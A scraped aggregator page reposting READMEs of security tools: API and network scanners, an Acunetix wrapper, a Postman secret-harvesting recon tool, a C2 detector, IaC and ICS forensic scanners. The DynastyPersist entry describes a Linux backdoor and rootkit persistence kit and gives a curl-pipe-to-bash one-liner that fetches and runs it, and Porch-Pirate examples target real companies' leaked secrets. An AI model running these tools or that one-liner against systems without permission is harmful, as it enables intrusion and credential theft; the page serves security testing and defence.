Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------

FootNote

Https work still in progress

Contributing

Contributions are welcome! To contribute to PacketSpy, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:

License

PacketSpy is released under the MIT License. See LICENSE for more information.



APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

RISK DETAILS OF EACH ENDPOINT APIDETECTOR FINDS

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.1.1  │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.3  │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
│ 192.168.1.2  │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
│ 192.168.1.98 │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.25 │ **:49:**:00:**:38 │ 102         │ Unknown                      │
└──────────────┴───────────────────┴─────────────┴──────────────────────────────┘

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



AcuAutomate - Unofficial Acunetix CLI Tool For Automated Pentesting And Bug Hunting Across Large Scopes

By: Zion3R


AcuAutomate is an unofficial Acunetix CLI tool that simplifies automated pentesting and bug hunting across extensive targets. It's a valuable aid during large-scale pentests, enabling the easy launch or stoppage of multiple Acunetix scans simultaneously. Additionally, its versatile functionality seamlessly integrates into enumeration wrappers or one-liners, offering efficient control through its pipeline capabilities.


Installation

git clone https://github.com/danialhalo/AcuAutomate.git
cd AcuAutomate
chmod +x AcuAutomate.py
pip3 install -r requirements.txt

Configuration (config.json)

Before using AcuAutomate, you need to set up the configuration file config.json inside the AcuAutomate folder:

{
"url": "https://localhost",
"port": 3443,
"api_key": "API_KEY"
}
  • The URL and PORT parameter is set to default acunetix settings, However this can be changed depending on acunetix configurations.
  • Replace the API_KEY with your acunetix api key. The key can be obtained from user profiles at https://localhost:3443/#/profile

Usage

The help parameter (-h) can be used for accessing more detailed help for specific actions

    		                               __  _                 ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py [-h] {scan,stop} ...

Launch or stop a scan using Acunetix API

positional arguments:
{scan,stop} Action to perform
scan Launch a scan use scan -h
stop Stop a scan

options:
-h, --help show this help message and exit

Scan Actions

For launching the scan you need to use the scan actions:

xubuntu:~/AcuAutomate$ ./AcuAutomate.py scan -h

usage: AcuAutomate.py scan [-h] [-p] [-d DOMAIN] [-f FILE]
[-t {full,high,weak,crawl,xss,sql}]

options:
-h, --help show this help message and exit
-p, --pipe Read from pipe
-d DOMAIN, --domain DOMAIN
Domain to scan
-f FILE, --file FILE File containing list of URLs to scan
-t {full,high,weak,crawl,xss,sql}, --type {full,high,weak,crawl,xss,sql}
High Risk Vulnerabilities Scan, Weak Password Scan, Crawl Only,
XSS Scan, SQL Injection Scan, Full Scan (by default)

Scanning Single Target

The domain can be provided with -d flag for single site scan:

./AcuAutomate.py scan -d https://www.google.com

Scanning Multiple Targets

For scanning multiple domains the domains need to be added into the file and then specify the file name with -f flag:

./AcuAutomate.py scan -f domains.txt

Pipeline

The AcuAutomate can also worked with the pipeline input with -p flag:

cat domain.txt | ./AcuAutomate.py scan -p

This is Great  as it can enable the AcuAutomate to work with other tools. For example we can use the subfinder , httpx and then pipe the output to AcuAutomate for mass scanning with acunetix:

subfinder -silent -d google.com | httpx -silent | ./AcuAutomate.py scan -p

scan type

The -t flag can be used to define the scan type. For example the following scan will only detect the SQL vulnerabilities:

./AcuAutomate.py scan -d https://www.google.com -t sql

Note

AcuAutomate only accept the domains with http:// or https://

Stop Action

The stop action can be used for stoping the scan either with -d flag for stoping scan by specifing the domain or with -a flage for stopping all running scans.

xubuntu:~/AcuAutomate$ ./AcuAutomate.py stop -h


__ _ ___
____ ________ ______ ___ / /_(_) __ _____/ (_)
/ __ `/ ___/ / / / __ \/ _ \/ __/ / |/_/_____/ ___/ / /
/ /_/ / /__/ /_/ / / / / __/ /_/ /> </_____/ /__/ / /
\__,_/\___/\__,_/_/ /_/\___/\__/_/_/|_| \___/_/_/

-: By Danial Halo :-


usage: AcuAutomate.py stop [-h] [-d DOMAIN] [-a]

options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain of the scan to stop
-a, --all Stop all Running Scans

Contact

Please submit any bugs, issues, questions, or feature requests under "Issues" or send them to me on Twitter. @DanialHalo



Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.


Search for c2 servers based on netlas (8)

Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search at the google.com IP address on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



DynastyPersist - A Linux Persistence Tool!

By: Zion3R


  • A Linux persistence tool!

  • A powerful and versatile Linux persistence script designed for various security assessment and testing scenarios. This script provides a collection of features that demonstrate different methods of achieving persistence on a Linux system.


Features

  1. SSH Key Generation: Automatically generates SSH keys for covert access.

  2. Cronjob Persistence: Sets up cronjobs for scheduled persistence.

  3. Custom User with Root: Creates a custom user with root privileges.

  4. RCE Persistence: Achieves persistence through remote code execution.

  5. LKM/Rootkit: Demonstrates Linux Kernel Module (LKM) based rootkit persistence.

  6. Bashrc Persistence: Modifies user-specific shell initialization files for persistence.

  7. Systemd Service for Root: Sets up a systemd service for achieving root persistence.

  8. LD_PRELOAD Privilege Escalation Config: Configures LD_PRELOAD for privilege escalation.

  9. Backdooring Message of the Day / Header: Backdoors system message display for covert access.

  10. Modify an Existing Systemd Service: Manipulates an existing systemd service for persistence.

Usage

  1. Clone this repository to your local machine:

    git clone https://github.com/Trevohack/DynastyPersist.git
  2. One linear

    curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Support

For support, email spaceshuttle.io.all@gmail.com or join our Discord server.

  • Discord: https://discord.gg/WYzu65Hp

Thank You!



Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities

By: Zion3R


Service that scans your Infrastructure as Code for common vulnerabilities.

Aspect Information
Tool name IaC Scan Runner
Docker image xscanner/runner
PyPI package iac-scan-runner
Documentation docs
Contact us xopera@xlab.si

Purpose and description

The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

Running

This section explains how to run the REST API.

Run with Docker

You can run the REST API using a public xscanner/runner Docker image as follows:

# run IaC Scan Runner REST API in a Docker container and 
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

Or you can build the image locally and run it as follows:

# build Docker container (it will take some time) 
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

Run from CLI

To run using the IaC Scan Runner CLI:

# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run

Run from source

To run locally from source:

# Export env variables 
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled

# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo

# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app

Usage and examples

This part will show one of the possible deployments and short examples on how to use API calls.

Firstly we will clone the iac scan runner repository and run the API.

$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up

After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

  1. Lets create a project named test.
curl -X 'POST' \
'http://0.0.0.0/project?creator_id=test' \
-H 'accept: application/json' \
-d ''

project id will be returned to us. For this example project id is 1e7b2a91-2896-40fd-8d53-83db56088026.

  1. For example, let say we want to initiate all check expect ansible-lint. Let's disable it.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
  1. Now when project is configured, we can simply choose files that we want to scan and zip them. For IaC-Scan-Runner to work files are expected to be a compressed archives (usually zip files). In this case response type will be json , but it is possible to change it to html.Please change YOUR.zip to path of your file.
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'

That is it.

Extending the scan workflow with new check tools

At certain point, it might be required to include new check tools within the scan workflow, with aim to provide wider coverage of IaC standards and project types. Therefore, in this subsection, a sequence of required steps for that purpose is identified and described. However, the steps have to be performed manually as it will be described, but it is planned to automatize this procedure in future via API and provide user-friendly interface that will aid the user while importing new tools that will become part of the available catalogue that makes the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool.

Step 1 – Adding tool-specific class to checks directory First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runner’s source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides generalization of scan workflow tools. Moreover, it is necessary to provide implementation of the following methods:

  1. def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
  2. def run(self, directory: str) While the first one aims to provide the necessary tool-specific parameters in order to set it up (such as passwords, client ids and tokens), another one specifies how the tool itself is invoked via API or CLI and its raw output returned.

Step 2 – Adding the check tool class instance within ScanRunner constructor Once the new class derived from Check is added to the IaC Scan Runner’s source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and adding it to the dictionary of IaC checks inside def init_checks(self). A. Importing the check tool class from iac_scan_runner.checks.tfsec import TfsecCheck B. Creating new instance of check tool object inside init_checks """Initiate predefined check objects""" new_tool = NewToolCheck() C. Adding it to self.iac_checks dictionary inside init_checks

    self.iac_checks = {
new_tool.name: new_tool,

}

Step 3 – Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type.

    compatibility_matrix = {
"new_type": ["new_tool_1", "new_tool_2"],

"old_typeK": ["tool_1", … "tool_N", "new_tool_3"]
}

Step 4 – Providing the support for result summarization Finally, the last step in sequence of required modifications for scan workflow extension is to modify class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following structure of if-else should be included:

        if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"

Contact

You can contact the xOpera team by sending an email to xopera@xlab.si.

Acknowledgement

This project has received funding from the European Union’s Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).



ICS-Forensics-Tools - Microsoft ICS Forensics Framework

By: Zion3R


Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.


Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

git clone https://github.com/microsoft/ics-forensics-tools.git

Prerequisites

Installing

  • Install python requirements

    pip install -r requirements.txt

Usage

General application arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
-s, --save-config Save config file for easy future usage Optional
-c, --config Config file path, default is config.json Optional
-o, --output-dir Directory in which to output any generated files, default is output Optional
-v, --verbose Log output to a file as well as the console Optional
-p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

Specific plugin arguments:

Args Description Required / Optional
-h, --help show this help message and exit Optional
--ip Addresses file path, CIDR or IP addresses csv (ip column required).
add more columns for additional info about each ip (username, pass, etc...)
Required
--port Port number Optional
--transport tcp/udp Optional
--analyzer Analyzer name to run Optional

Executing examples in the command line

 python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess

Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig
forensic = ForensicClient()
plugin = PluginConfig.from_json({
"name": "PluginName",
"port": 123,
"transport": "tcp",
"addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
"parameters": {
},
"analyzers": []
})
forensic.scan([plugin])

Architecture

Adding Plugins

When developing locally make sure to mark src folder as "Sources root"

  • Create new directory under plugins folder with your plugin name
  • Create new Python file with your plugin name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport


class GeneralCLI(PluginCLI):
def __init__(self, folder_name):
super().__init__(folder_name)
self.name = "General"
self.description = "General Plugin Description"
self.port = 123
self.transport = Transport.TCP

def flags(self, parser):
self.base_flags(parser, self.port, self.transport)
parser.add_argument('--general', help='General additional argument', metavar="")


class General(PluginInterface):
def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)

def connect(self, address):
self.logger.info(f"{self.config.name} connect")

def export(self, extracted):
self.logger.info(f"{self.config.name} export")
  • Make sure to import your new plugin in the __init__.py file under the plugins folder
  • In the PluginInterface inherited class there is 'config' parameters, you can use this to access any data that's available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
    there are 2 mandatory functions (connect, export).
    the connect function receives single ip address and extracts any relevant information from the device and return it.
    the export function receives the information that was extracted from all the devices and there you can export it to file.
  • In the PluginCLI inherited class you need to specify in the init function the default information related to this plugin.
    there is a single mandatory function (flags).
    In which you must call base_flags, and you can add any additional flags that you want to have.

Adding Analyzers

  • Create new directory under analyzers folder with the plugin name that related to your analyzer.
  • Create new Python file with your analyzer name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


class General(AnalyzerInterface):
def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
super().__init__(config, output_dir, verbose)
self.plugin_name = 'General'
self.create_output_dir(self.plugin_name)

def analyze(self):
pass
  • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

Resources and Technical data & solution:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

Section 52 under MSRC blog
ICS Lecture given about the tool
